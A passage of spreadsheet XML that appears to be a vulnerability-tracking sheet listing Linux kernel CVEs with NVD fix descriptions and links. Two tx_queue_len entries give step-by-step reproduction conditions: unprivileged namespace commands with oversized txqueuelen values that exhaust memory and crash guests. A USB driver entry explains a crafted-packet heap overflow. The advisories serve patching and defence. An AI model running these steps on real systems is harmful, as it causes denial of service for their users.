      <c r="K653" s="5" t="inlineStr"/>
      <c r="L653" s="5" t="inlineStr"/>
      <c r="M653" s="5" t="inlineStr"/>
      <c r="N653" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O653" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P653" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q653" s="5" t="inlineStr"/>
      <c r="R653" s="5" t="inlineStr"/>
      <c r="S653" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: mctp: i3c: serialize probe with bus removal
mctp_i3c_probe() drops busdevs_lock after finding the matching bus. A
concurrent I3C_NOTIFY_BUS_REMOVE can then unregister and free the bus
netdev before probe passes its private data to mctp_i3c_add_device().
The latter consequently adds a list node through a freed mbus pointer.
Keep busdevs_lock held until the device has been added. This also
satisfies the __must_hold annotation on mctp_i3c_add_device().</t>
        </is>
      </c>
      <c r="T653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98018</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B654" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98019</t>
        </is>
      </c>
      <c r="D654" s="5" t="inlineStr"/>
      <c r="E654" s="5" t="inlineStr"/>
      <c r="F654" s="5" t="inlineStr"/>
      <c r="G654" s="5" t="inlineStr"/>
      <c r="H654" s="5" t="inlineStr"/>
      <c r="I654" s="5" t="inlineStr"/>
      <c r="J654" s="5" t="inlineStr">
        <is>
          <t>checkpoint</t>
        </is>
      </c>
      <c r="K654" s="5" t="inlineStr"/>
      <c r="L654" s="5" t="inlineStr"/>
      <c r="M654" s="5" t="inlineStr"/>
      <c r="N654" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O654" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P654" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q654" s="5" t="inlineStr"/>
      <c r="R654" s="5" t="inlineStr"/>
      <c r="S654" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: mark a NULL call argument precise
check_func_arg() allows bpf_register_is_null() for nullable arguments
w/o marking the underlying scalar register precise. Hence a checkpoint
created on such a path would prune against arbitrary scalar value.
check_helper_call() enforces second parameter of the
bpf_get_local_storage() to be zero, w/o marking the underlying scalar
register precise. Hence a checkpoint created on such a path would
prune against arbitrary scalar value.
Grouping these two into one patch, as they share the same fixes tag.</t>
        </is>
      </c>
      <c r="T654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98019</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B655" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98020</t>
        </is>
      </c>
      <c r="D655" s="5" t="inlineStr"/>
      <c r="E655" s="5" t="inlineStr"/>
      <c r="F655" s="5" t="inlineStr"/>
      <c r="G655" s="5" t="inlineStr"/>
      <c r="H655" s="5" t="inlineStr"/>
      <c r="I655" s="5" t="inlineStr"/>
      <c r="J655" s="5" t="inlineStr"/>
      <c r="K655" s="5" t="inlineStr"/>
      <c r="L655" s="5" t="inlineStr"/>
      <c r="M655" s="5" t="inlineStr"/>
      <c r="N655" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O655" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P655" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q655" s="5" t="inlineStr"/>
      <c r="R655" s="5" t="inlineStr"/>
      <c r="S655" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
pds_core: fix cmd_regs access racing BAR unmap on reset
pdsc_reset_prepare() and pdsc_reset_done()'s pdsc_map_bars() error path
clear/iounmap cmd_regs without devcmd_lock, and
pdsc_legacy_firmware_update()'s download loop derefs cmd_regs after
dropping and retaking the lock without re-checking. An FLR concurrent
with a devlink flash can unmap cmd_regs under an in-flight devcmd,
causing a NULL deref or a write to unmapped MMIO.
Take devcmd_lock across the BAR unmap/remap, and re-check cmd_regs in
the download loop. Only the PF maps cmd_regs and runs devcmd, so skip
the unmap on a VF, as pdsc_remove() and pdsc_reset_done() already do.
A reset that completes entirely within the unlocked window is not a
correctness problem for the image: the device clears its update session,
so a resumed download is rejected, and it verifies the staged image
before writing a flash slot, reporting PDS_RC_BAD_FW rather than
activating it.
pdsc_unmap_bars() also clears info_regs, intr_status and intr_ctrl. The
interrupt and start/stop readers of those are quiesced before the unmap
by pdsc_fw_down(), which frees the interrupts and tears down the queues.
The debugfs readers are not, since those files outlive a reset; that is
pre-existing and out of scope here.</t>
        </is>
      </c>
      <c r="T655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98020</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B656" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98021</t>
        </is>
      </c>
      <c r="D656" s="5" t="inlineStr"/>
      <c r="E656" s="5" t="inlineStr"/>
      <c r="F656" s="5" t="inlineStr"/>
      <c r="G656" s="5" t="inlineStr"/>
      <c r="H656" s="5" t="inlineStr"/>
      <c r="I656" s="5" t="inlineStr"/>
      <c r="J656" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K656" s="5" t="inlineStr"/>
      <c r="L656" s="5" t="inlineStr"/>
      <c r="M656" s="5" t="inlineStr"/>
      <c r="N656" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O656" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P656" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q656" s="5" t="inlineStr"/>
      <c r="R656" s="5" t="inlineStr"/>
      <c r="S656" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: reject oversized tx_queue_len at netlink parse time
rtnl_create_link() assigns IFLA_TXQLEN directly to dev-&gt;tx_queue_len
without going through netif_change_tx_queue_len(), so a device created
with "ip link add ... txqueuelen 500000" bypasses the S16_MAX cap and
still triggers the oversized ring allocations in pfifo_fast, tun and
tap. The veth peer nest (rtnl_nla_parse_ifinfomsg()) and the
RTM_NEWLINK-on-existing-device path reach the same sinks.
Enforce the cap in ifla_policy instead: IFLA_TXQLEN becomes
NLA_POLICY_FULL_RANGE(NLA_U32, &amp;txqlen_range) with
txqlen_range = { .min = 0, .max = S16_MAX }. All netlink consumers
parse against this policy - rtnl_setlink(), rtnl_newlink() (create
and change), and the veth peer nest - so every netlink path is capped
at parse time and rejects the attribute with -ERANGE plus a proper
"integer out of range" extack message before any device state is
modified (the RTM_SETLINK half-application wart is gone with it).
Document the bound in the rt-link.yaml netlink spec.
Conditions to recreate the bug:
- CONFIG_NET_SCHED=y, CONFIG_VETH=y, CONFIG_USER_NS=y, CONFIG_NET_NS=y.
- Unprivileged user in a fresh user+net namespace (unshare -Urn):
  ip link add v0 txqueuelen 500000 type veth peer name v1
  -&gt; on the fixed kernel this is rejected with -ERANGE ("integer out
  of range" extack) instead of installing an oversized tx_queue_len
  that later inflates pfifo_fast/tun/tap ring allocations.
- ip link set v0 txqueuelen 500000 is likewise rejected at parse time.</t>
        </is>
      </c>
      <c r="T656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98021</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B657" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98022</t>
        </is>
      </c>
      <c r="D657" s="5" t="inlineStr"/>
      <c r="E657" s="5" t="inlineStr"/>
      <c r="F657" s="5" t="inlineStr"/>
      <c r="G657" s="5" t="inlineStr"/>
      <c r="H657" s="5" t="inlineStr"/>
      <c r="I657" s="5" t="inlineStr"/>
      <c r="J657" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K657" s="5" t="inlineStr"/>
      <c r="L657" s="5" t="inlineStr"/>
      <c r="M657" s="5" t="inlineStr"/>
      <c r="N657" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O657" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P657" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q657" s="5" t="inlineStr"/>
      <c r="R657" s="5" t="inlineStr"/>
      <c r="S657" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: cap tx_queue_len at S16_MAX to prevent oversized ring allocations
Several subsystems allocate ring buffers sized by dev-&gt;tx_queue_len
with no upper bound. An unprivileged user (via unshare -Urn) can set a
huge tx_queue_len and exhaust global memory with ring allocations:
- pfifo_fast: pfifo_fast_init() and pfifo_fast_change_tx_queue_len()
  allocate 3 skb_array rings of tx_queue_len entries each.
- tun: tun_queue_resize() and the queue-attach path resize ptr_rings
  to tx_queue_len on the NETDEV_CHANGE_TX_QUEUE_LEN notifier.
- tap (macvtap/ipvtap): tap_queue_resize() and tap_init() resize/init
  ptr_rings to tx_queue_len on the same notifier.
netif_change_tx_queue_len() is the single entry point for IFLA_TXQLEN,
sysfs, and the SIOCSIFTXQLEN ioctl. Cap new_len at S16_MAX (32767)
there so the oversized value is rejected at set time. This takes
effect whether the device is up or down, before dev-&gt;tx_queue_len is
written, before any notifier fires, and before any ring is allocated.
The "&gt; S16_MAX" check also subsumes the previous unsigned-long
truncation test, and a negative ifr_qlen from the ioctl lands far
above the cap after conversion, so both old failure modes are covered
by the one comparison.
tx_queue_len is ambigious: both a per-ring sizing multiplier and a
default queue-length/limit knob for consumers that allocate
nothing at set time (pfifo/bfifo/gred/plug/sfb limits, htb
direct_qlen, qfq max_classes, teql). 32767 is chosen as the largest
value NLA_POLICY_FULL_RANGE can express for the u32 IFLA_TXQLEN
policy in patch 2/3 while staying a legitimate queue length on
high-BDP paths; the ring-memory trade-off of a shared knob is
disclosed below.
Conditions to recreate the bug:
- CONFIG_NET_SCHED=y, CONFIG_VETH=y, CONFIG_USER_NS=y, CONFIG_NET_NS=y.
- Unprivileged user in a fresh user+net namespace (unshare -Urn).
- pfifo_fast: create veth pairs, set tx_queue_len to 500000, attach
  mq+pfifo_fast. ~28 iterations OOMs a 2GB guest.
- tun: create 50 tun devices with IFF_MULTI_QUEUE, set tx_queue_len to
  500000, open 8 queues each. ~1.6GB of ptr_ring allocations OOMs a
  512MB guest.
- tap: same as tun with IFF_TAP. ~960MB OOMs a 512MB guest.
- On the fixed kernel the oversized tx_queue_len is rejected with
  -ERANGE at set time (all four paths: RTM_SETLINK, RTM_NEWLINK
  create, sysfs, ioctl - the latter two via this check, the former
  two via this check and the 2/3 parse policy respectively).</t>
        </is>
      </c>
      <c r="T657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98022</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B658" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98024</t>
        </is>
      </c>
      <c r="D658" s="5" t="inlineStr"/>
      <c r="E658" s="5" t="inlineStr"/>
      <c r="F658" s="5" t="inlineStr"/>
      <c r="G658" s="5" t="inlineStr"/>
      <c r="H658" s="5" t="inlineStr"/>
      <c r="I658" s="5" t="inlineStr"/>
      <c r="J658" s="5" t="inlineStr"/>
      <c r="K658" s="5" t="inlineStr"/>
      <c r="L658" s="5" t="inlineStr"/>
      <c r="M658" s="5" t="inlineStr"/>
      <c r="N658" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O658" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P658" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q658" s="5" t="inlineStr"/>
      <c r="R658" s="5" t="inlineStr"/>
      <c r="S658" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/ism: folio_put() after error
dmb-&gt;cpu_addr was allocated via folio_alloc(). Use folio_put() instead of
kfree() in the error exit of ism_alloc_dmb() to avoid slab allocator
corruption.
While at it, reset dmb-&gt;cpu_addr after folio_put to avoid unintentional UAF
by future callers.</t>
        </is>
      </c>
      <c r="T658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98024</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B659" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98025</t>
        </is>
      </c>
      <c r="D659" s="5" t="inlineStr"/>
      <c r="E659" s="5" t="inlineStr"/>
      <c r="F659" s="5" t="inlineStr"/>
      <c r="G659" s="5" t="inlineStr"/>
      <c r="H659" s="5" t="inlineStr"/>
      <c r="I659" s="5" t="inlineStr"/>
      <c r="J659" s="5" t="inlineStr"/>
      <c r="K659" s="5" t="inlineStr"/>
      <c r="L659" s="5" t="inlineStr"/>
      <c r="M659" s="5" t="inlineStr"/>
      <c r="N659" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O659" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P659" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q659" s="5" t="inlineStr"/>
      <c r="R659" s="5" t="inlineStr"/>
      <c r="S659" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: usb: cx82310_eth: drop URB after 0xffff reboot sentinel to prevent partial_data heap overflow
The 0xffff length sentinel detects a router reboot and schedules
re-enabling of ethernet mode, but then falls through to the rest
of the loop body.  The next check is
	} else if (len &gt; CX82310_MTU) {
which is the else of the just-matched if -- it never fires for
len == 0xffff.  The MTU bound that normally caps the
incomplete-packet save path is silently bypassed.
With 0xffff &gt; skb-&gt;len always true (rx_urb_size is 4096), the
incomplete-packet branch saves dev-&gt;partial_len = skb-&gt;len bytes
into dev-&gt;partial_data.  partial_data is kmalloc(hard_mtu) =
kmalloc(CX82310_MTU + 2) = 1516 bytes, but skb-&gt;len after the
2-byte header pull can be up to 4094.  A device that sends a
4096-byte URB starting with [0xff 0xff] therefore copies 4094
device-provided bytes into a buffer allocated for 1516 bytes,
exceeding its requested size by 2578 bytes.
The next URB then reads dev-&gt;partial_len (4094) back from the same
1516-byte buffer and dev-&gt;partial_rem (65535 - 4094 = 61441) from
the new URB's ~4KB skb, both well past their allocations, and
delivers the spliced result as a 64KB "frame" to the network
stack.
Bail out of rx_fixup after scheduling the re-enable work; the
remainder of a reboot-marker URB is not meaningful packet data.
This restores the invariant that partial_len &lt; CX82310_MTU + 2 on
the save path, since every other route there has already passed
the MTU check.</t>
        </is>
      </c>
      <c r="T659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98025</t>
        </is>
      </c>
    </row>
    <row r="660">
      <c r="A660" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B660" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98026</t>
        </is>
      </c>
      <c r="D660" s="5" t="inlineStr"/>
      <c r="E660" s="5" t="inlineStr"/>
      <c r="F660" s="5" t="inlineStr"/>
      <c r="G660" s="5" t="inlineStr"/>
      <c r="H660" s="5" t="inlineStr"/>
      <c r="I660" s="5" t="inlineStr"/>
      <c r="J660" s="5" t="inlineStr"/>
      <c r="K660" s="5" t="inlineStr"/>
      <c r="L660" s="5" t="inlineStr"/>
      <c r="M660" s="5" t="inlineStr"/>
      <c r="N660" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O660" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P660" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q660" s="5" t="inlineStr"/>
      <c r="R660" s="5" t="inlineStr"/>
      <c r="S660" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: bridge: mcast: properly convert mglist to rcu
Sashiko reported a bug [1] that br_multicast_del_port_group unlists the
port group not using proper rcu helper that preserves the next pointer and
after that immediately frees the port group without waiting for rcu grace
period. The only rcu walker of mglist is br_multicast_list_adjacent() and
it turns out that function has always been buggy because mglist was never
properly converted to RCU. Fix it by converting it to rcu and moving its
initialization after eth_addr's. Initializing p-&gt;next can use
RCU_INIT_POINTER because we have a barrier from the hlist_add_head_rcu call
later, besides we're initializing an unpublished structure anyway.
[1] https://netdev-ai.bots.linux.dev/sashiko/#/patchset/20260826014200.362304-1-littleddfu%40gmail.com</t>
        </is>
      </c>
      <c r="T660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98026</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B661" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98028</t>
        </is>
      </c>
      <c r="D661" s="5" t="inlineStr"/>
      <c r="E661" s="5" t="inlineStr"/>
      <c r="F661" s="5" t="inlineStr"/>
      <c r="G661" s="5" t="inlineStr"/>
      <c r="H661" s="5" t="inlineStr"/>
      <c r="I661" s="5" t="inlineStr"/>
      <c r="J661" s="5" t="inlineStr"/>
      <c r="K661" s="5" t="inlineStr"/>
      <c r="L661" s="5" t="inlineStr"/>
      <c r="M661" s="5" t="inlineStr"/>
      <c r="N661" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O661" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P661" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q661" s="5" t="inlineStr"/>
      <c r="R661" s="5" t="inlineStr"/>
      <c r="S661" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
eth: nfp: drop the replaced rule from the list when reprogramming fails
nfp_net_fs_add() replaces an existing rule by deleting it from the
hardware, decrementing nn-&gt;fs.count and programming the new one.  If
nfp_net_fs_add_hw() fails the old entry stays on nn-&gt;fs.list - only the
success path reaches list_replace() - so the list is one longer than
nn-&gt;fs.count, and it advertises a rule whose hardware entry has already
been torn down.
nn-&gt;fs.count is what ETHTOOL_GRXCLSRLCNT reports, so userspace then sizes
its buffer one entry short of what the GRXCLSRLALL walk wants to write.
That used to overwrite one u32 past the allocation; since the walk is
bounded it is a permanent -EMSGSIZE instead, as nothing ever resyncs the
counter.</t>
        </is>
      </c>
      <c r="T661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98028</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B662" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98031</t>
        </is>
      </c>
      <c r="D662" s="5" t="inlineStr"/>
      <c r="E662" s="5" t="inlineStr"/>
      <c r="F662" s="5" t="inlineStr"/>
      <c r="G662" s="5" t="inlineStr"/>
      <c r="H662" s="5" t="inlineStr"/>
      <c r="I662" s="5" t="inlineStr"/>
      <c r="J662" s="5" t="inlineStr"/>
      <c r="K662" s="5" t="inlineStr"/>
      <c r="L662" s="5" t="inlineStr"/>
      <c r="M662" s="5" t="inlineStr"/>
      <c r="N662" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O662" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P662" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q662" s="5" t="inlineStr"/>
      <c r="R662" s="5" t="inlineStr"/>
      <c r="S662" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nexthop: Initialize extack in remove_nh_grp_entry()
remove_nh_grp_entry() prints the extack message when a listener fails
to replace the reduced nexthop group. However, extack is not
initialized and listeners are not required to set a message when
returning an error. Neither netdevsim nor mlxsw do so when an
allocation fails, resulting in the dereference of an uninitialized
stack pointer.
Fix by zero-initializing extack, as was done in commit 6347c5314cee
("nexthop: initialize extack in nh_res_bucket_migrate()").</t>
        </is>
      </c>
      <c r="T662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98031</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B663" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98032</t>
        </is>
      </c>
      <c r="D663" s="5" t="inlineStr"/>
      <c r="E663" s="5" t="inlineStr"/>
      <c r="F663" s="5" t="inlineStr"/>
      <c r="G663" s="5" t="inlineStr"/>
      <c r="H663" s="5" t="inlineStr"/>
      <c r="I663" s="5" t="inlineStr"/>
      <c r="J663" s="5" t="inlineStr"/>
      <c r="K663" s="5" t="inlineStr"/>
      <c r="L663" s="5" t="inlineStr"/>
      <c r="M663" s="5" t="inlineStr"/>
      <c r="N663" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O663" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P663" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q663" s="5" t="inlineStr"/>
      <c r="R663" s="5" t="inlineStr"/>
      <c r="S663" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Fix subbuf resize races with trace_pipe_raw readers
Concurrent subbuffer resizes may crash trace_pipe_raw readers or leak
uninitialized memory to userspace due to stale size values.
Modify ring_buffer_alloc_read_page() to handle the resizing of an
existing buffer_data_read_page if necessary and add a new
ring_buffer_read_page_size(). This new function enables ring-buffer
buffer_data_read_page users to not call the racy
ring_buffer_subbuf_size_get(). This makes the spare_size member of
ftrace_buffer_info redundant.
Finally, handle buffer_data_read_page/reader_page order discrepancy in
ring_buffer_read_page(). On a mismatch simply copy manually the data to
the buffer_data_read_page.</t>
        </is>
      </c>
      <c r="T663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98032</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B664" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98033</t>
        </is>
      </c>
      <c r="D664" s="5" t="inlineStr"/>
      <c r="E664" s="5" t="inlineStr"/>
      <c r="F664" s="5" t="inlineStr"/>
      <c r="G664" s="5" t="inlineStr"/>
      <c r="H664" s="5" t="inlineStr"/>
      <c r="I664" s="5" t="inlineStr"/>
      <c r="J664" s="5" t="inlineStr"/>
      <c r="K664" s="5" t="inlineStr"/>
      <c r="L664" s="5" t="inlineStr"/>
      <c r="M664" s="5" t="inlineStr"/>
      <c r="N664" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O664" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P664" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q664" s="5" t="inlineStr"/>
      <c r="R664" s="5" t="inlineStr"/>
      <c r="S664" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Preserve inner map identity in callback frames
Callback frame constructors initialize map-typed argument registers with
__mark_reg_known_zero() and then restore map_ptr. This clears map_uid,
which is the only field distinguishing inner maps that share an
inner_map_meta template.
When a timer callback invokes bpf_for_each_map_elem() on a second inner
map, both the saved first map and the second map value can reach the nested
callback as the same template with map_uid zero. bpf_timer_init() then
accepts pairing the timer from the second map with the first map.
The runtime records the first map in the timer without taking a reference.
Freeing that map does not find the timer stored in the second map, so a
later timer callback dereferences the freed map.
Copy map_uid from the same caller register as map_ptr when constructing
for-each, timer/workqueue, and task-work callback arguments. The existing
identity check can then reject mismatched inner maps while allowing a
callback value to be paired with its actual map.</t>
        </is>
      </c>
      <c r="T664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98033</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B665" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98034</t>
        </is>
      </c>
      <c r="D665" s="5" t="inlineStr"/>
      <c r="E665" s="5" t="inlineStr"/>
      <c r="F665" s="5" t="inlineStr"/>
      <c r="G665" s="5" t="inlineStr"/>
      <c r="H665" s="5" t="inlineStr"/>
      <c r="I665" s="5" t="inlineStr"/>
      <c r="J665" s="5" t="inlineStr">
        <is>
          <t>checkpoint, rust</t>
        </is>
      </c>
      <c r="K665" s="5" t="inlineStr"/>
      <c r="L665" s="5" t="inlineStr"/>
      <c r="M665" s="5" t="inlineStr"/>
      <c r="N665" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O665" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P665" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q665" s="5" t="inlineStr"/>
      <c r="R665" s="5" t="inlineStr"/>
      <c r="S665" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark NULL kptr stores precise
check_map_kptr_access() permits a scalar store into an untrusted kptr
field only when the register is known to contain zero. Unlike other
verifier checks whose outcome depends on a scalar value, it does not mark
that register precise.
A state checkpoint reached with an imprecise zero can therefore prune a
second path that reaches the store with an arbitrary nonzero scalar. The
program can write attacker-controlled bits into the kptr field and load
them back as a PTR_TO_BTF_ID.
Call mark_chain_precision() before accepting a known-zero register. This
forces state equivalence to compare its scalar range and makes the verifier
visit and reject a path carrying a nonzero value.</t>
        </is>
      </c>
      <c r="T665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98034</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B666" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98035</t>
        </is>
      </c>
      <c r="D666" s="5" t="inlineStr"/>
      <c r="E666" s="5" t="inlineStr"/>
      <c r="F666" s="5" t="inlineStr"/>
      <c r="G666" s="5" t="inlineStr"/>
      <c r="H666" s="5" t="inlineStr"/>
      <c r="I666" s="5" t="inlineStr"/>
      <c r="J666" s="5" t="inlineStr"/>
      <c r="K666" s="5" t="inlineStr"/>
      <c r="L666" s="5" t="inlineStr"/>
      <c r="M666" s="5" t="inlineStr"/>
      <c r="N666" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O666" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P666" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q666" s="5" t="inlineStr"/>
      <c r="R666" s="5" t="inlineStr"/>
      <c r="S666" s="5" t="inlineStr">
        <is>
